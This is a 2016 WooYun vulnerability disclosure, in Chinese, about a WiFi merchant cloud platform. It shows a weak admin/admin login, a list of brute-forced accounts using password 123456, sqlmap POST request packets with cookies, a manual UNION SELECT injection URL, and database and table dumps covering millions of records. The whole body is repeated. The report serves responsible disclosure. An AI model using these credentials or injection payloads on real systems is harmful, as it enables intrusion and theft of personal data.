当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208462

漏洞标题:wifi安全之周边云多系统弱口令+SQL打包(涉及583w商家信息+大量订单可修改app信息)

相关厂商:北京和瑞创想科技有限公司

漏洞作者: 黑色键盘丶

提交时间:2016-05-14 11:00

修复时间:2016-07-02 13:50

公开时间:2016-07-02 13:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-14: 细节已通知厂商并且等待厂商处理中
2016-05-18: 厂商已经确认,细节仅向厂商公开
2016-05-28: 细节向核心白帽子及相关领域专家公开
2016-06-07: 细节向普通白帽子公开
2016-06-17: 细节向实习白帽子公开
2016-07-02: 细节向公众公开

简要描述:

RT

详细说明:

首先是:**.**.**.**:10001/admin.php/Index/index.html admin admin进入


后台可修改app信息 这个后台没啥可以操作的哦

1.png


2.png


--------------------------------------------------------------------

然后来到这里http://**.**.**.**/ 商家管理后台 尝试爆破


3.png


这里376状态是都可以进的 密码123456  好多个 383状态估计是用户名正确的
chengxin 123456
jinyue 123456
lining 123456
qingxin 123456
wangchao 123456
wangxin 123456
xiaodong123456
xuxiaomei 123456
yanghong 123456
yun 123456


然后登陆了个王鑫汽车的账户


34.png


可以对app进行管理咯


45.png


在后台找到个sql注入
sqlmap语法:sqlmap.py -r 1.txt --dbs
---------------------post数据包----------参数catid--------- 这个注入点在修改分类这块
POST /o2o/updateProductCateGrop.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/o2o/productCateGropInit.do
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522; JSESSIONID=1da7df7b-bac2-44de-9ebe-86eda561443b
catid=7316&cateGropName=1&ordernum=11


数据库信息
back-end DBMS: MySQL 5.0
available databases [17]:
[*] ad_wifi
[*] ad_wifi_online
[*] ad_wifi_showlog
[*] auth_cloub
[*] auth_wifi
[*] auth_wifi_databak
[*] auth_wifi_toline
[*] billing_system
[*] information_schema
[*] mdlch
[*] personal_tailor
[*] pkg_platform
[*] red_packets
[*] st_mdl
[*] tenant
[*] test
[*] trade_01


当前库表信息  这里583w的商家信息+63的订单信息咯
Database: auth_wifi
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| st_login_log | 14110424 |
| st_day_login | 12605281 |
| auth_connections_history | 11849367 |
| st_hour_count | 10752818 |
| wifi_user_shop | 8411638 |
| wifi_user_device | 5865862 |
| wifi_user | 5836911 |
| st_day_login_8history | 3686906 |
| stat_day | 1664443 |
| agent_ad_order_time | 1118218 |
| wifi_user_online_time | 982065 |
| auth_user | 802278 |
| auth_user_group_relate | 749158 |
| app_click_log | 697793 |
| zn_app_order | 639375 |
| zn_app_pay | 443122 |
| mdl_user_score_details | 393232 |
| auth_connections_tmp | 359406 |
| users_login_log | 299028 |
| st_day_area | 258574 |
| mdl_user | 241478 |
| mdl_user_20160504 | 212262 |
| mdl_user_wxinfo | 165720 |
| zn_st_settle_accounts | 139458 |
| auth_usergroup | 139208 |
| cash_auth_shop_day | 138273 |
| wap_stat_log | 133454 |
| mdl_user_coupon | 92528 |
| nodes_201504 | 86145 |
| nodes_201505 | 84555 |
| agent_child_day | 80292 |
| stat_month | 76690 |
| nodes_201506 | 76265 |
| wap_activity_menu | 76166 |
| nodes_201502 | 74710 |
| nodes_201501 | 74646 |
| nodes_201507 | 73591 |
| zn_app_tables | 71047 |
| nodes_201508 | 69654 |
| nodes_201509 | 61986 |
| shop_online_user | 61847 |
| f_agent_category | 57046 |
| user_roles | 53314 |
| user_role_module | 52786 |
| users | 52692 |
| auth_shop | 51980 |
| nodes_201503 | 49728 |
| sms_log | 47529 |
| auth_shop_mid | 42678 |
| auth_shop_20160127 | 42549 |
| users_20151222 | 40232 |
| zn_app_client | 40159 |
| mdl_redpacket_details | 37415 |
| auth_shop_module | 36411 |
| zn_app_product | 36125 |
| auth_shop_copy | 33355 |
| ad_advertis | 30122 |
| zn_app_shop_module | 28721 |
| mdl_table_category | 26740 |
| nodes | 25450 |
| auth_hotspot_count | 23498 |
| zn_app_order_group_buy | 23083 |
| auth_hotspot | 20274 |
| zn_app_install_day | 18733 |
| nodes_201510 | 18055 |
| auth_shop_bak | 17872 |
| user_role_module_bak | 15904 |
| wap_activity_feature | 15831 |
| weixin_userinfo | 14611 |
| auth_connections | 14045 |
| zn_app_order_detail | 13708 |
| auth_shop_card_detail | 12481 |
| device_router_bak | 12006 |
| device_router | 10327 | 1w多台路由信息吧
| zn_app_user | 10290 |
| agent_ad_order_industry | 10199 |
| zn_app_group_buy | 8195 |
| zn_app_tables_fr | 7976 |
| zn_app_group_setmeal | 7706 |
| zn_app_product_categroy | 7316 |
| cash_auth_agent_day | 7007 |
| zn_app_ad | 6688 |
| auth_black_list | 6449 |
| agent_ad_show_log | 5347 |
| auth_shop_dynamicimage | 5319 |
| mdl_code_Jurisdiction | 5098 |
| agent_ad_st_industry_day | 4337 |
| zn_app_pay_history | 4012 |
| bossclick_msg | 3986 |
| dic_base_area | 3570 |
| auth_agent_order | 3405 |
| dic_county | 3173 |
| zn_app_mobile_click | 3127 |
| agent_ad_st_time_day | 3094 |
| zn_app_group_buy_bak | 2948 |
| zn_app_fastbuy_groupbuy | 2837 |
| zn_app_shop_groupbuynum | 2706 |
| auth_bussiness_department | 2558 |
| zn_app_hot_groupbuy | 2430 |
| zn_app_topic_groupbuy | 1684 |
| zn_app_activity_feature | 1681 |
| agent_ad_order_province | 1563 |
| auth_bussiness_news | 1482 |
| zn_app_version_his | 1389 |
| agent_ad_order_hotspot | 1305 |
| zn_app_agent_categroy | 1236 |
| zn_app_shop_top | 1112 |
| auth_shop_card_awards | 1067 |
| mdl_coupon_activity | 1014 |
| auth_shop_coupon_detail | 994 |
| zn_app_coupon_set | 966 |
| auth_shop_weixin | 961 |
| zn_app_banner | 836 |
| agent_sale | 807 |
| zn_app_agent_area | 684 |
| zn_app_comment | 667 |
| zn_app_topic | 643 |
| agent_online_user | 619 |
| zn_app_favorites_groupbuy | 592 |
| mdl_shop_clerk_wx_alert | 527 |
| agent_child_hour | 516 |
| auth_agent | 516 |
| agent_ad_st_area_day | 496 |
| auth_sms_log | 486 |
| zn_app_user_address | 466 |
| mdl_agent_cate | 455 |
| cash_account | 446 |
| zn_app_favorites | 444 |
| zn_app_agent_categroy_bak | 437 |
| zn_app_agent_fastbuy | 421 |
| auth_shop_print_device | 415 |
| agent_ad_position_day | 384 |
| dic_city | 364 |
| zn_app_pay_refund | 364 |
| zn_app_msg | 362 |
| zn_app_user_coupon | 360 |
| mdl_user_score_duiba_exchange_result | 359 |
| mdl_user_score_duiba_exchange_details | 355 |
| auth_shop_coupon | 339 |
| mdl_first_preferential | 335 |
| st_month_login | 329 |
| zn_app_banner_bak | 322 |
| auth_shop_card | 321 |
| agent_ad_show | 314 |
| zn_app_favorites_product | 286 |
| device_mac_white | 263 |
| f_category | 252 |
| zn_app_category_banner | 222 |
| zn_app_version | 207 |
| auth_agent_bak | 198 |
| auth_shop_card_bak | 198 |
| zn_app_topic_bak | 189 |
| sms_recharge_log | 185 |
| hd_activities | 164 |
| dic_ad_time | 151 |
| zn_app_agent_fastbuy_bak | 145 |
| zn_app_agent_info | 137 |
| auth_agent_buydevice_copy | 133 |
| copy_of_auth_agent_buydevice | 133 |
| mdl_industry_category | 127 |
| hd_userdetail | 122 |
| agent_ad_st_day | 114 |
| f_page | 112 |
| zn_mdl_feedback | 98 |
| auth_agent_pay_cfg | 96 |
| auth_agent_buydevice | 85 |
| agent_ad_order_source | 76 |
| zn_app_category_banner_bak | 68 |
| mdl_micro_subsidy | 67 |
| ad_collect | 66 |
| mdl_micro_subsidy_20160421 | 58 |
| hd_cat | 55 |
| agent_ad_order | 53 |
| st_tmp | 50 |
| zn_app_custom_details | 43 |
| wap_nav | 42 |
| dic_province | 31 |
| temp_group | 31 |
| mdl_agent_bankaccount | 29 |
| dic_mobile | 27 |
| ad_advertis_more | 26 |
| hd_comment | 26 |
| wx_user | 22 |
| radacct | 20 |
| agent_ad_owner | 16 |
| zn_app_product_tmp | 14 |
| counter | 11 |
| p_role | 11 |
| hd_report | 10 |
| auth_agent_open_city | 9 |
| auth_agent_user | 8 |
| dic_ad_position | 8 |
| dic_network | 8 |
| radcheck | 8 |
| dic_base_info | 6 |
| dic_refund_reason | 6 |
| auth_template | 5 |
| mdl_user_buy_score_pay | 5 |
| radgroupreply | 5 |
| auth_agent_buyorder | 4 |
| dic_profit | 4 |
| user_roles_url | 4 |
| auth_group | 3 |
| dic_device | 3 |
| dic_saleteam | 3 |
| mdl_system_config | 3 |
| auth_agent_social_share_cfg | 2 |
| dic_consume_meal | 2 |
| mdl_coin_activity | 2 |
| mdl_shop_welcome | 2 |
| open_token | 2 |
| wap_banner | 2 |
| wap_cat | 2 |
| auth_shop_pay_cfg | 1 |
| cs_product | 1 |
| dic_base_info_type | 1 |
| dic_collect | 1 |
| radgroupcheck | 1 |
| radusergroup | 1 |
| wap_user | 1 |
+---------------------------------------+---------+


另外这里注入就是这块登陆的
POST /ad/login.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 33
Accept: */*
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://**.**.**.**/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522
username=yangfang&password=123456


available databases [6]:
[*] ad_wifi
[*] ad_wifi_online
[*] ad_wifi_showlog
[*] auth_wifi
[*] information_schema
[*] test
Database: ad_wifi
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| ad_show_log_bak | 5494020 |
| ad_order_time | 990274 |
| ad_st_time_day | 442304 |
| ad_visit_log | 437092 |
| ad_st_industry_day | 400526 |
| ad_st_area_day | 143023 |
| ad_order_hotspot | 119858 |
| ad_order_industry | 85127 |
| ad_st_day | 30962 |
| ad_order_saleprice | 5626 |
| ad_order_province | 4636 |
| ad_order_source | 3247 |
| ad_owner_industry | 1373 |
| ad_show | 1316 |
| ad_order | 1035 |
| ad_owner | 625 |
| dic_time | 151 |
| ad_show_log | 8 |
| dic_saleprice | 6 |
| ad_agent_set | 4 |
| ad_account | 1 |
| ad_agent_shop | 1 |
| counter | 1 |
+--------------------+---------+


http://**.**.**.**/login.ftl 然后来这个系统 爆破了下出来一个
yangfan 123456


3333333.png


找到个注入点 学习手工注入下
http://**.**.**.**/mdl/index_showDetail.do?pagId=-148%20%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16


出数据库


111111.png


漏洞证明:

首先是:**.**.**.**:10001/admin.php/Index/index.html admin admin进入


后台可修改app信息 这个后台没啥可以操作的哦

1.png


2.png


--------------------------------------------------------------------

然后来到这里http://**.**.**.**/ 商家管理后台 尝试爆破


3.png


这里376状态是都可以进的 密码123456  好多个 383状态估计是用户名正确的
chengxin 123456
jinyue 123456
lining 123456
qingxin 123456
wangchao 123456
wangxin 123456
xiaodong123456
xuxiaomei 123456
yanghong 123456
yun 123456


然后登陆了个王鑫汽车的账户


34.png


可以对app进行管理咯


45.png


在后台找到个sql注入
sqlmap语法:sqlmap.py -r 1.txt --dbs
---------------------post数据包----------参数catid--------- 这个注入点在修改分类这块
POST /o2o/updateProductCateGrop.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/o2o/productCateGropInit.do
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522; JSESSIONID=1da7df7b-bac2-44de-9ebe-86eda561443b
catid=7316&cateGropName=1&ordernum=11


数据库信息
back-end DBMS: MySQL 5.0
available databases [17]:
[*] ad_wifi
[*] ad_wifi_online
[*] ad_wifi_showlog
[*] auth_cloub
[*] auth_wifi
[*] auth_wifi_databak
[*] auth_wifi_toline
[*] billing_system
[*] information_schema
[*] mdlch
[*] personal_tailor
[*] pkg_platform
[*] red_packets
[*] st_mdl
[*] tenant
[*] test
[*] trade_01


当前库表信息  这里583w的商家信息+63的订单信息咯
Database: auth_wifi
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| st_login_log | 14110424 |
| st_day_login | 12605281 |
| auth_connections_history | 11849367 |
| st_hour_count | 10752818 |
| wifi_user_shop | 8411638 |
| wifi_user_device | 5865862 |
| wifi_user | 5836911 |
| st_day_login_8history | 3686906 |
| stat_day | 1664443 |
| agent_ad_order_time | 1118218 |
| wifi_user_online_time | 982065 |
| auth_user | 802278 |
| auth_user_group_relate | 749158 |
| app_click_log | 697793 |
| zn_app_order | 639375 |
| zn_app_pay | 443122 |
| mdl_user_score_details | 393232 |
| auth_connections_tmp | 359406 |
| users_login_log | 299028 |
| st_day_area | 258574 |
| mdl_user | 241478 |
| mdl_user_20160504 | 212262 |
| mdl_user_wxinfo | 165720 |
| zn_st_settle_accounts | 139458 |
| auth_usergroup | 139208 |
| cash_auth_shop_day | 138273 |
| wap_stat_log | 133454 |
| mdl_user_coupon | 92528 |
| nodes_201504 | 86145 |
| nodes_201505 | 84555 |
| agent_child_day | 80292 |
| stat_month | 76690 |
| nodes_201506 | 76265 |
| wap_activity_menu | 76166 |
| nodes_201502 | 74710 |
| nodes_201501 | 74646 |
| nodes_201507 | 73591 |
| zn_app_tables | 71047 |
| nodes_201508 | 69654 |
| nodes_201509 | 61986 |
| shop_online_user | 61847 |
| f_agent_category | 57046 |
| user_roles | 53314 |
| user_role_module | 52786 |
| users | 52692 |
| auth_shop | 51980 |
| nodes_201503 | 49728 |
| sms_log | 47529 |
| auth_shop_mid | 42678 |
| auth_shop_20160127 | 42549 |
| users_20151222 | 40232 |
| zn_app_client | 40159 |
| mdl_redpacket_details | 37415 |
| auth_shop_module | 36411 |
| zn_app_product | 36125 |
| auth_shop_copy | 33355 |
| ad_advertis | 30122 |
| zn_app_shop_module | 28721 |
| mdl_table_category | 26740 |
| nodes | 25450 |
| auth_hotspot_count | 23498 |
| zn_app_order_group_buy | 23083 |
| auth_hotspot | 20274 |
| zn_app_install_day | 18733 |
| nodes_201510 | 18055 |
| auth_shop_bak | 17872 |
| user_role_module_bak | 15904 |
| wap_activity_feature | 15831 |
| weixin_userinfo | 14611 |
| auth_connections | 14045 |
| zn_app_order_detail | 13708 |
| auth_shop_card_detail | 12481 |
| device_router_bak | 12006 |
| device_router | 10327 | 1w多台路由信息吧
| zn_app_user | 10290 |
| agent_ad_order_industry | 10199 |
| zn_app_group_buy | 8195 |
| zn_app_tables_fr | 7976 |
| zn_app_group_setmeal | 7706 |
| zn_app_product_categroy | 7316 |
| cash_auth_agent_day | 7007 |
| zn_app_ad | 6688 |
| auth_black_list | 6449 |
| agent_ad_show_log | 5347 |
| auth_shop_dynamicimage | 5319 |
| mdl_code_Jurisdiction | 5098 |
| agent_ad_st_industry_day | 4337 |
| zn_app_pay_history | 4012 |
| bossclick_msg | 3986 |
| dic_base_area | 3570 |
| auth_agent_order | 3405 |
| dic_county | 3173 |
| zn_app_mobile_click | 3127 |
| agent_ad_st_time_day | 3094 |
| zn_app_group_buy_bak | 2948 |
| zn_app_fastbuy_groupbuy | 2837 |
| zn_app_shop_groupbuynum | 2706 |
| auth_bussiness_department | 2558 |
| zn_app_hot_groupbuy | 2430 |
| zn_app_topic_groupbuy | 1684 |
| zn_app_activity_feature | 1681 |
| agent_ad_order_province | 1563 |
| auth_bussiness_news | 1482 |
| zn_app_version_his | 1389 |
| agent_ad_order_hotspot | 1305 |
| zn_app_agent_categroy | 1236 |
| zn_app_shop_top | 1112 |
| auth_shop_card_awards | 1067 |
| mdl_coupon_activity | 1014 |
| auth_shop_coupon_detail | 994 |
| zn_app_coupon_set | 966 |
| auth_shop_weixin | 961 |
| zn_app_banner | 836 |
| agent_sale | 807 |
| zn_app_agent_area | 684 |
| zn_app_comment | 667 |
| zn_app_topic | 643 |
| agent_online_user | 619 |
| zn_app_favorites_groupbuy | 592 |
| mdl_shop_clerk_wx_alert | 527 |
| agent_child_hour | 516 |
| auth_agent | 516 |
| agent_ad_st_area_day | 496 |
| auth_sms_log | 486 |
| zn_app_user_address | 466 |
| mdl_agent_cate | 455 |
| cash_account | 446 |
| zn_app_favorites | 444 |
| zn_app_agent_categroy_bak | 437 |
| zn_app_agent_fastbuy | 421 |
| auth_shop_print_device | 415 |
| agent_ad_position_day | 384 |
| dic_city | 364 |
| zn_app_pay_refund | 364 |
| zn_app_msg | 362 |
| zn_app_user_coupon | 360 |
| mdl_user_score_duiba_exchange_result | 359 |
| mdl_user_score_duiba_exchange_details | 355 |
| auth_shop_coupon | 339 |
| mdl_first_preferential | 335 |
| st_month_login | 329 |
| zn_app_banner_bak | 322 |
| auth_shop_card | 321 |
| agent_ad_show | 314 |
| zn_app_favorites_product | 286 |
| device_mac_white | 263 |
| f_category | 252 |
| zn_app_category_banner | 222 |
| zn_app_version | 207 |
| auth_agent_bak | 198 |
| auth_shop_card_bak | 198 |
| zn_app_topic_bak | 189 |
| sms_recharge_log | 185 |
| hd_activities | 164 |
| dic_ad_time | 151 |
| zn_app_agent_fastbuy_bak | 145 |
| zn_app_agent_info | 137 |
| auth_agent_buydevice_copy | 133 |
| copy_of_auth_agent_buydevice | 133 |
| mdl_industry_category | 127 |
| hd_userdetail | 122 |
| agent_ad_st_day | 114 |
| f_page | 112 |
| zn_mdl_feedback | 98 |
| auth_agent_pay_cfg | 96 |
| auth_agent_buydevice | 85 |
| agent_ad_order_source | 76 |
| zn_app_category_banner_bak | 68 |
| mdl_micro_subsidy | 67 |
| ad_collect | 66 |
| mdl_micro_subsidy_20160421 | 58 |
| hd_cat | 55 |
| agent_ad_order | 53 |
| st_tmp | 50 |
| zn_app_custom_details | 43 |
| wap_nav | 42 |
| dic_province | 31 |
| temp_group | 31 |
| mdl_agent_bankaccount | 29 |
| dic_mobile | 27 |
| ad_advertis_more | 26 |
| hd_comment | 26 |
| wx_user | 22 |
| radacct | 20 |
| agent_ad_owner | 16 |
| zn_app_product_tmp | 14 |
| counter | 11 |
| p_role | 11 |
| hd_report | 10 |
| auth_agent_open_city | 9 |
| auth_agent_user | 8 |
| dic_ad_position | 8 |
| dic_network | 8 |
| radcheck | 8 |
| dic_base_info | 6 |
| dic_refund_reason | 6 |
| auth_template | 5 |
| mdl_user_buy_score_pay | 5 |
| radgroupreply | 5 |
| auth_agent_buyorder | 4 |
| dic_profit | 4 |
| user_roles_url | 4 |
| auth_group | 3 |
| dic_device | 3 |
| dic_saleteam | 3 |
| mdl_system_config | 3 |
| auth_agent_social_share_cfg | 2 |
| dic_consume_meal | 2 |
| mdl_coin_activity | 2 |
| mdl_shop_welcome | 2 |
| open_token | 2 |
| wap_banner | 2 |
| wap_cat | 2 |
| auth_shop_pay_cfg | 1 |
| cs_product | 1 |
| dic_base_info_type | 1 |
| dic_collect | 1 |
| radgroupcheck | 1 |
| radusergroup | 1 |
| wap_user | 1 |
+---------------------------------------+---------+


另外这里注入就是这块登陆的
POST /ad/login.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 33
Accept: */*
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://**.**.**.**/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522
username=yangfang&password=123456


available databases [6]:
[*] ad_wifi
[*] ad_wifi_online
[*] ad_wifi_showlog
[*] auth_wifi
[*] information_schema
[*] test
Database: ad_wifi
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| ad_show_log_bak | 5494020 |
| ad_order_time | 990274 |
| ad_st_time_day | 442304 |
| ad_visit_log | 437092 |
| ad_st_industry_day | 400526 |
| ad_st_area_day | 143023 |
| ad_order_hotspot | 119858 |
| ad_order_industry | 85127 |
| ad_st_day | 30962 |
| ad_order_saleprice | 5626 |
| ad_order_province | 4636 |
| ad_order_source | 3247 |
| ad_owner_industry | 1373 |
| ad_show | 1316 |
| ad_order | 1035 |
| ad_owner | 625 |
| dic_time | 151 |
| ad_show_log | 8 |
| dic_saleprice | 6 |
| ad_agent_set | 4 |
| ad_account | 1 |
| ad_agent_shop | 1 |
| counter | 1 |
+--------------------+---------+


http://**.**.**.**/login.ftl 然后来这个系统 爆破了下出来一个
yangfan 123456


3333333.png


找到个注入点 学习手工注入下
http://**.**.**.**/mdl/index_showDetail.do?pagId=-148%20%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16


出数据库


111111.png


修复方案:

加强密码 过滤参数

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-18 13:48

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-14 12:57 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    666